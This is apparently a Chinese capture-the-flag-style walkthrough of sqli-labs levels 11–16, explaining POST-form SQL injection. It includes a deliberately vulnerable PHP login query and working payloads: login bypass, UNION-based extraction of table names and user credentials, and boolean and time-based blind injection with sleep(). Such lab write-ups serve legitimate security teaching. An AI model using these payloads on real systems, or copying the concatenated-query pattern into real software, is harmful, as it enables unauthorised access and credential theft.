表单注入——sqli-labs第11~16关
目录
- [第11关](https://cloud.tencent.com/developer/audit/support-plan/10680463#11_1)
- [0、万能账号、密码的前提](https://cloud.tencent.com/developer/audit/support-plan/10680463#0_2)
- [1、判断是否POST注入](https://cloud.tencent.com/developer/audit/support-plan/10680463#1POST_30)
- [2、猜测后台SQL语句](https://cloud.tencent.com/developer/audit/support-plan/10680463#2SQL_40)
- [3、判断闭合符](https://cloud.tencent.com/developer/audit/support-plan/10680463#3_44)
- [4 、查询列数](https://cloud.tencent.com/developer/audit/support-plan/10680463#4__51)
- [5、找显示位](https://cloud.tencent.com/developer/audit/support-plan/10680463#5_66)
- [6、查库名](https://cloud.tencent.com/developer/audit/support-plan/10680463#6_69)
- [7、查表名](https://cloud.tencent.com/developer/audit/support-plan/10680463#7_77)
- [8、查列名](https://cloud.tencent.com/developer/audit/support-plan/10680463#8_84)
- [9、找账号密码](https://cloud.tencent.com/developer/audit/support-plan/10680463#9_91)
- [第12关](https://cloud.tencent.com/developer/audit/support-plan/10680463#12_98)
- [第13关](https://cloud.tencent.com/developer/audit/support-plan/10680463#13_103)
- [第14关](https://cloud.tencent.com/developer/audit/support-plan/10680463#14_117)
- [1](https://cloud.tencent.com/developer/audit/support-plan/10680463#1_118)
- [2](https://cloud.tencent.com/developer/audit/support-plan/10680463#2_130)
- [3](https://cloud.tencent.com/developer/audit/support-plan/10680463#3_146)
- [4](https://cloud.tencent.com/developer/audit/support-plan/10680463#4_153)
- [5](https://cloud.tencent.com/developer/audit/support-plan/10680463#5_162)
- [6](https://cloud.tencent.com/developer/audit/support-plan/10680463#6_169)
- [第15关](https://cloud.tencent.com/developer/audit/support-plan/10680463#15_171)
- [第16关](https://cloud.tencent.com/developer/audit/support-plan/10680463#16_175)第11关
0、万能账号、密码的前提
登录的验证方式如下面这种
……
$Name = $_POST['userName'];
$pwd = $_POST['password'];
$loginSQL = "select * from users where userName='$Name' and password='$pwd'";
echo $loginSQL;
$resultLogin = mysql_query($loginSQL);
if (mysql_num_rows($resultLogin) > 0) {
echo "登录成功";
} else {
echo "登录失败";
}
closeConnect();
……重点是这句话
select * from users where userName='$Name' and password='$pwd'加入 ' or 1# 后,变成这样:
select * from users where userName='$Name ' or 1# ' and password='$pwd'"#后面都被注释,即此语句恒为真。所以登录成功
1、判断是否POST注入
观察是post还是get
可以看url的变化,或者看源码
1.
2.
2、猜测后台SQL语句
3、判断闭合符
在表单里分别输入XXXX' or 1# , xxxx" or 1#。然后按下submit,观察反应
发现单引号是闭合符。
4 、查询列数
xxxx ' order by 3 #xxxx ' order by 2 #
说明是两列。
5、找显示位
6、查库名
cwa' union select 1,database()#
7、查表名
cwa' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
8、查列名
cwa' union select 1,group_concat(column_name) from information_schema.COLUMNs where table_schema='security' and table_name='users'#
9、找账号密码
cwa' union select 1,group_concat(concat_ws(",",username,password) SEPARATOR "|") from users #
第12关
和第11关一样,只不过闭合符是")
第13关
查列数
admin') order by 2#
查显示位,没有输出
admin') union select 1,2#
所以使用布尔盲注,参考第五关的第二种方法
第14关
1
……
ibeb’ order by 5#
ibeb") order by 5#
ibeb’) order by 5#
ibeb" order by 5#
找出闭合符是"
2
两列
wsgver" order by 2 #
发现不回显,所以可以使用延迟盲注
fwfwf" union select 1,2#
3
ibeb" or if(3>2,sleep(2),1)#
发现延迟不止2秒,猜测应该是查询的数据太多,每个数据延迟2秒,加起来就很长时间了。所以可以把延迟时间改为0.2,可以减少等待的时间。
4
数据库名是8位
vvwc" or if(length(database())>7,sleep(3),1) #
vvwc" or if(length(database())>8,sleep(3),1) #
5
第一位的ASCII值是115,是s
vvwc" or if(ascii(substr(database(),1,1))>114,sleep(3),1) #
vvwc" or if(ascii(substr(database(),1,1))>115,sleep(3),1) #
6
…………
第15关
闭合符是'
可以使用布尔盲注
第16关
闭合符是")